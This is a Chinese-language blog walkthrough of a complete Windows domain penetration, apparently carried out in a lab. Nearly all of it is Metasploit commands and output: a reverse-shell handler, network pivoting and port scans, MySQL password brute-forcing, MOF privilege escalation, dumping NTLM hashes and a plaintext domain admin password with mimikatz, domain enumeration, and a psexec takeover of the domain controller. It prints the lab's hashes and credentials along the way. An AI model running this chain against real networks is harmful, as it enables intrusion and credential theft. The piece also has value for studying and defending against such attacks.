一次完整的域渗透

一次完整的域渗透


域渗透很多人还是在懵懂状态,有些文章我感觉说的不完整。今天带来一个例子和大家讲解一些域渗透。


如有说错 望指定批评。


环境看如图


网关.png


域控2008


首先在域客户机2008生成执行metasploit后门文件


kali metasploit 监听端口

use exploit/multi/handler
set payload windows/meterpreter/reverse_tcp
set lhost 192.168.0.115
exploit


当前getuid获取 当然用户

Server username: MOONSEC\server2008


当然域普通用户server2008用户权限较低 只能执行一下简单命令,无法获取hash 这种需要较高权限。


使用arp_scanner模块 检测在线主机


run post/windows/gather/arp_scanner RHOSTS=10.10.10.0/24

发现存在域客户机2003 ip 10.10.1.3

metasploit background 把 session 后在后台运行。


metasploit 增加路由

route add 10.10.1.3 255.255.255.0 1

使用扫描模块

use scanner/portscan/tcp

set rhosts 10.10.1.3

exploit


发现存在 3306端口开放 存在mysql服务。

使用这个模块对mysql进行穷举。

use scanner/mysql/mysql_login


msf auxiliary(scanner/mysql/mysql_login) > set USERNAME root

USERNAME => root

msf auxiliary(scanner/mysql/mysql_login) > set PASS_FILE /root/passlist.txt

PASS_FILE => /root/passlist.txt

msf auxiliary(scanner/mysql/mysql_login) > exploit

[-] Auxiliary failed: Msf::OptionValidateError The following options failed to validate: RHOSTS.

msf auxiliary(scanner/mysql/mysql_login) > set RHOSTS 10.10.1.3

RHOSTS => 10.10.1.3

msf auxiliary(scanner/mysql/mysql_login) > exploit

[+] 10.10.1.3:3306        - 10.10.1.3:3306 - Found remote MySQL version 5.1.33

[-] 10.10.1.3:3306        - 10.10.1.3:3306 - LOGIN FAILED: root:admin (Incorrect: Access denied for user 'root'@'10.10.1.4' (using password: YES))

[+] 10.10.1.3:3306        - 10.10.1.3:3306 - Success: 'root:123456'

得到密码 123456


使用mof模块进行权限获取

use windows/mysql/mysql_mof

msf exploit(windows/mysql/mysql_mof) > set PASSWORD 123456

PASSWORD => 123456

msf exploit(windows/mysql/mysql_mof) > set rhost 10.10.1.3

rhost => 10.10.1.3

msf exploit(windows/mysql/mysql_mof) > set USERNAME root

USERNAME => root

msf exploit(windows/mysql/mysql_mof) > set payload windows/meterpreter/bind_tcp

payload => windows/meterpreter/bind_tcp

msf exploit(windows/mysql/mysql_mof) > exploit

 

[*] Started bind handler

[*] 10.10.1.3:3306 - Attempting to login as 'root:123456'

[*] 10.10.1.3:3306 - Uploading to 'C:/windows/system32/DmnwQ.exe'

[*] 10.10.1.3:3306 - Uploading to 'C:/windows/system32/wbem/mof/rqVAh.mof'

[*] Sending stage (179779 bytes) to 10.10.1.3

[*] Meterpreter session 2 opened (192.168.0.115-192.168.0.113:0 -> 10.10.1.3:4444) at 2018-04-06 22:29:52 +0800

[!] 10.10.1.3:3306 - This exploit may require manual cleanup of 'DmnwQ.exe' on the target

[!] 10.10.1.3:3306 - This exploit may require manual cleanup of 'wbem\mof\good\rqVAh.mof' on the target


通过mysql mof提权 得到 域客机2003 sessions

通过getuid命令获取当前权限 发现是system权限。


通过命令hash获取域客户机的hash。


Administrator:500:7473799d16fd7eefc81667e9d738c5d9:befccf58421ac6b3b2815de02cac1616:::
ASPNET:1006:80b60fc868a0cbc3bd0107c50c110a28:e04a5c063acf0ac96c00809a3ea194cf:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
IUSR_WWW-7D165A978F4:1000:23a1de9066032b6646bb5d5cc9f4c859:c53193935ad813f22fc1356905671c62:::
IWAM_WWW-7D165A978F4:1001:5cc30f4530496c7eee7579d3764abed1:f81064c3b40a531a62de432ff2ff35e6:::
SUPPORT_388945a0:1004:aad3b435b51404eeaad3b435b51404ee:66b367fafaec7a8eb267e06c8e7a8969:::

因为普通域用户 需要更改系统信息 都需要通过域管理员的操作 要输入帐号和密码


所以可以通过mimikatz这个模块获取明文试试。

meterpreter > load mimikatz
Loading extension mimikatz...Success.
meterpreter > msv
[+] Running as SYSTEM
[*] Retrieving msv credentials
msv credentials
===============

AuthID    Package    Domain        User             Password
------    -------    ------        ----             --------
0;996     Negotiate  NT AUTHORITY  NETWORK SERVICE  lm{ 00000000000000000000000000000000 }, ntlm{ f0e9813cf9884abe4eed4f79a1656f25 }
0;53193   NTLM                                      lm{ 00000000000000000000000000000000 }, ntlm{ f0e9813cf9884abe4eed4f79a1656f25 }
0;390687  Kerberos   MOONSEC       administrator    lm{ 81c44219672813f068f8291659d0fd61 }, ntlm{ f8db9dd8aa13fa4e008f693fb7c56935 }
0;997     Negotiate  NT AUTHORITY  LOCAL SERVICE    n.s. (Credentials KO)
0;999     Negotiate  MOONSEC       SERVERS2003$     n.s. (Credentials KO)

meterpreter > kerberos
[+] Running as SYSTEM
[*] Retrieving kerberos credentials
kerberos credentials
====================

AuthID    Package    Domain        User             Password
------    -------    ------        ----             --------
0;996     Negotiate  NT AUTHORITY  NETWORK SERVICE  
0;997     Negotiate  NT AUTHORITY  LOCAL SERVICE    
0;53193   NTLM                                      
0;999     Negotiate  MOONSEC       SERVERS2003$     
0;390687  Kerberos   MOONSEC       administrator    xxx123456..

得到明文
0;390687  Kerberos   MOONSEC       administrator    xxx123456..


域控怎么查 因为域一般需要dns 加入域控都要设置域控的dns 查询查看网卡信息就可以了咯


一些域内的命令


查看域
net view /domain

查看当前域中的计算机
net view

查看CORP域中的计算机
net view /domain:CORP

Ping计算机名可以得到IP
ping Wangsong-PC

获取所有域的用户列表
net user /domain

获取域用户组信息
net group /domain

获取当前域管理员信息
net group "domain admins" /domain

查看域时间及域服务器的名字
net time /domain

net time /domain 就可以知道域的计算机名

WIN-723O786H6KU.moonsec.com 10.10.1.2 这个就是域控

net group "domain admins" /domain 查询域控的管理员是 administrator

0;390687  Kerberos   MOONSEC       administrator    xxx123456..

这个是刚才获取的管理员帐号和密码 发现也是域控内的。

使用

msf exploit(windows/smb/psexec) > set RHOST 10.10.1.2
RHOST => 10.10.1.2
msf exploit(windows/smb/psexec) > set SMBDomain moonsec
SMBDomain => moonsec
msf exploit(windows/smb/psexec) > set SMBUser administrator
SMBUser => administrator
msf exploit(windows/smb/psexec) > set SMBPass xxx123456..
SMBPass => xxx123456..
msf exploit(windows/smb/psexec) > set payload windows/meterpreter/bind_tcp
payload => windows/meterpreter/bind_tcp
msf exploit(windows/smb/psexec) > exploit
[*] Started bind handler
[*] 10.10.1.2:445 - Connecting to the server...
[*] 10.10.1.2:445 - Authenticating to 10.10.1.2:445|moonsec as user 'administrator'...
[*] 10.10.1.2:445 - Selecting PowerShell target
[*] 10.10.1.2:445 - Executing the payload...
[+] 10.10.1.2:445 - Service start timed out, OK if running a command or non-service executable...
[*] Sending stage (179779 bytes) to 10.10.1.2
[*] Meterpreter session 3 opened (192.168.0.115-192.168.0.113:0 -> 10.10.1.2:4444) at 2018-04-06 22:46:15 +0800

得到域控的权限。


开启域控3389

远程登录域控。


已有点评

网警 2018-05-03 07:46
我们现在怀疑你是黑客,请跟我走一趟。
回复
月神 2018-05-03 11:03
@网警:.............

发表评论: